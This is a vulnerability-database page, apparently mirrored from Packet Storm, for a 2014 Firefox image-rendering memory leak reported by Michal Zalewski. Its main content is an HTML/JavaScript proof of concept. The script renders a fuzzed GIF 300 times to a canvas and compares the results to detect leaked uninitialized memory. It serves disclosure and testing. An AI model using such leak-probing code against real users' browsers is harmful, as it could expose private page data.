Vulners
Lucene search
Mozilla Firefox Secret Leak
🗓️ 03 Sep 2014 00:00:00Reported by Michal ZalewskiType 
packetstorm🔗 packetstormsecurity.com👁 68 Views
| Reporter | Title | Published | Views | Family All 59 |
|---|---|---|---|---|
 | Mozilla Firefox ESR < 24.8 Multiple Vulnerabilities | 6 Nov 201900:00 | – | nessus |
| Mozilla Firefox < 32.0 Multiple Vulnerabilities | 2 Sep 201400:00 | – | nessus |
| GLSA-201504-01 : Mozilla Products: Multiple vulnerabilities | 8 Apr 201500:00 | – | nessus |
| Firefox ESR 31.x < 31.1 Multiple Vulnerabilities (Mac OS X) | 3 Sep 201400:00 | – | nessus |
| Firefox < 32.0 Multiple Vulnerabilities (Mac OS X) | 3 Sep 201400:00 | – | nessus |
| Mozilla Thunderbird < 31.1 Multiple Vulnerabilities (Mac OS X) | 3 Sep 201400:00 | – | nessus |
| Mozilla Firefox ESR < 31.1 | 18 Dec 202500:00 | – | nessus |
| Mozilla Firefox < 32.0 | 18 Dec 202500:00 | – | nessus |
| Mozilla Thunderbird < 31.1 | 18 Dec 202500:00 | – | nessus |
| Mozilla Firefox ESR < 31.1 | 3 Sep 201400:00 | – | nessus |
10
`<style>
body {
background-color: #d0d0d0;
}
img {
border: 1px solid teal;
margin: 1ex;
}
canvas {
border: 1px solid crimson;
margin: 1ex;
}
</style>
<body onload="set_images()">
<div id="status">
</div>
<div id="image_div">
</div>
<canvas height=32 width=32 id=cvs>
</canvas>
<h2>Variants:</h2>
<ul id="output">
</ul>
<script>
var c = document.getElementById('cvs');
var ctx = c.getContext('2d');
var loaded = 0;
var image_obj = [];
var USE_IMAGES = 300;
function check_results() {
var uniques = [];
uniques.push(image_obj[0].imgdata);
document.getElementById('output').innerHTML +=
'<img src="' + image_obj[0].imgdata + '">';
for (var i = 1; i < USE_IMAGES; i++) {
if (image_obj[0].imgdata != image_obj[i].imgdata) {
for (var j = 1; j < uniques.length; j++)
if (uniques[j] == image_obj[i].imgdata) break;
if (j == uniques.length) {
uniques.push(image_obj[i].imgdata);
document.getElementById('output').innerHTML +=
'<img src="' + image_obj[i].imgdata + '">';
}
}
}
if (uniques.length > 1)
alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.');
else
alert('The image has just one variant when rendered. You\'re probably OK.');
}
function count_image() {
loaded++;
ctx.clearRect(0, 0, 32, 32);
try {
ctx.drawImage(this, 0, 0, 32, 32);
} catch (e) { }
this.imgdata = c.toDataURL();
if (loaded == USE_IMAGES) check_results();
}
function set_images() {
loaded = 0;
create_images();
for (var i = 0; i < USE_IMAGES; i++)
image_obj[i].src = './id:000110,src:000023.gif?' + Math.random();
}
function create_images() {
for (var i = 0; i < USE_IMAGES; i++) {
image_obj[i] = new Image();
image_obj[i].height = 32;
image_obj[i].width = 32;
image_obj[i].onerror = count_image;
image_obj[i].onload = count_image;
document.getElementById('image_div').appendChild(image_obj[i]);
}
}
</script>
<iframe src='http://www.cnn.com/'></iframe>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Sep 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.05465